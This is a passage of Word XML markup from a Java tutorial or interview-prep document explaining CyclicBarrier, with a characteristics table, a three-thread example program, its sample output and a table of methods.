      </w:r>
    </w:p>
    <w:p w14:paraId="44582E1C"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5" w:name="_Toc197867399"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>CyclicBarrier?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w14:paraId="47AA9ADE" w14:textId="4720F2B8" w:rsidR="00B01090" w:rsidRPr="00BB1AA7" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1AA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CyclicBarrier is a synchronization aid in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1AA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1AA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package. It allows a set of threads to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1AA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait at a common point (barrier)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1AA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> until all the participating threads have reached that point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770403E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4690CA6F">
          <v:rect id="_x0000_i6847" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="701672CE"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5527"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="766A6D68" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="283F4A8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haracteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F1B53C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7702DCB4" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BF426B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Package</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="107F198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java.util.concurrent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="7A30EC29" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43D9D9F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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="178C3DF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o synchronize a fixed number of threads at a common point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="0219801A" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E0E82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Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C3681A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Barrier that </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01090">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>resets</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01090">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> after all threads reach it (cyclic nature)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="740634B9" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2754060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Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D7887F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quires the number of threads (parties) to wait</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="14C98930" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D219D6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7DA096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Yes, can be reused after the barrier is broken</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="5E9F765C" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A0C0B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Optional Runnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C0D205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execute a task after the barrier is tripped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="268C9AD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3BB2E296">
          <v:rect id="_x0000_i6848" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BECE9"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2. How Does It Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795C8E3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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is initialized with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number of threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (parties) required to reach the barrier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC7EF3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Each thread calls the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>await()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method to indicate that it has reached the barrier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07306C0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hen the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>last thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>await()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the barrier is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tripped</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and all waiting threads are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>released</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ADA6D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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The barrier </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resets</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically, allowing it to be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6F6A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n optional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>barrier action</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be specified, executed by the last thread to reach the barrier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3690348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58AB5B4C">
          <v:rect id="_x0000_i6849" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B5E01"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3. Creating a CyclicBarrier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192331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yclicBarrier barrier = new CyclicBarrier(3); // 3 threads required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BED45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40DA6566">
          <v:rect id="_x0000_i6850" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E414E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4. Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10027D7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mport java.util.concurrent.CyclicBarrier;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A951E9E" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C4770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public class CyclicBarrierExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D181D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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F8A7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reating a CyclicBarrier for 3 threads with an optional barrier action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAF105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CyclicBarrier barrier = new CyclicBarrier(3, () -&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10133DD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All parties have arrived. Proceeding..."));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D381F38" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D12976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reating 3 worker threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48735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for (int i = 1; i &lt;= 3; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D876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new Thread(new Worker(barrier, "Worker-" + i)).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF65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72A9F5B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7D43C0A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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B436F03" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5506888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lass Worker implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1677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rivate final CyclicBarrier barrier;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBC6D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rivate final String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20688C10" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D206B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Worker(CyclicBarrier barrier, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559AB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is.barrier = barrier;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12268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is.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5BD54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01125B18" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B861D1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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316A88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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674C7DF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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A342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is working...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D00269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read.sleep((long) (Math.random() * 1000)); // Simulating work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D662D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reached the barrier.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BFF4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barrier.await(); // Wait at the barrier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9DCAD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System.out.println(name + " is released.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C92B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 catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79148DA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Thread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B3B7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0C74875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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D77EE6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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0236F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1570DE63">
          <v:rect id="_x0000_i6851" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49048A0F"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5. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E314ED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is working...  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA95C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is working...  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F41B17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is working...  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640F8F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reached the barrier.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C0F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reached the barrier.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F08671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reached the barrier.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067DAC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ll parties have arrived. Proceeding...  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B412D6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1 is released.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E77C73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2 is released.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2421AFE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Worker-3 is released.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6598C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lastRenderedPageBreak/>
        <w:pict w14:anchorId="261037C2">
          <v:rect id="_x0000_i6852" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A36AD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0"/>
        <w:gridCol w:w="5683"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="34978CEA" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F47157E"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15107CF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34CAD57C" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3505BDC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wait()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="384E742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uses the current thread to wait until all threads have arrived</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="39E4C838" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="646CBD4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wait(long timeout, TimeUnit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AA7293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aits for the specified time and then proceeds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="0AFC4D5D" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18E1F0C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getParties()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EDDB88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he number of parties required to trip the barrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="0ECD6C54" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C309F1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getNumberWaiting()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4054C31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he number of threads currently waiting at the barrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="50D5C18D" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79C188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set()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10A2CE6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sets the barrier to its initial state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="2DD6FF15" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
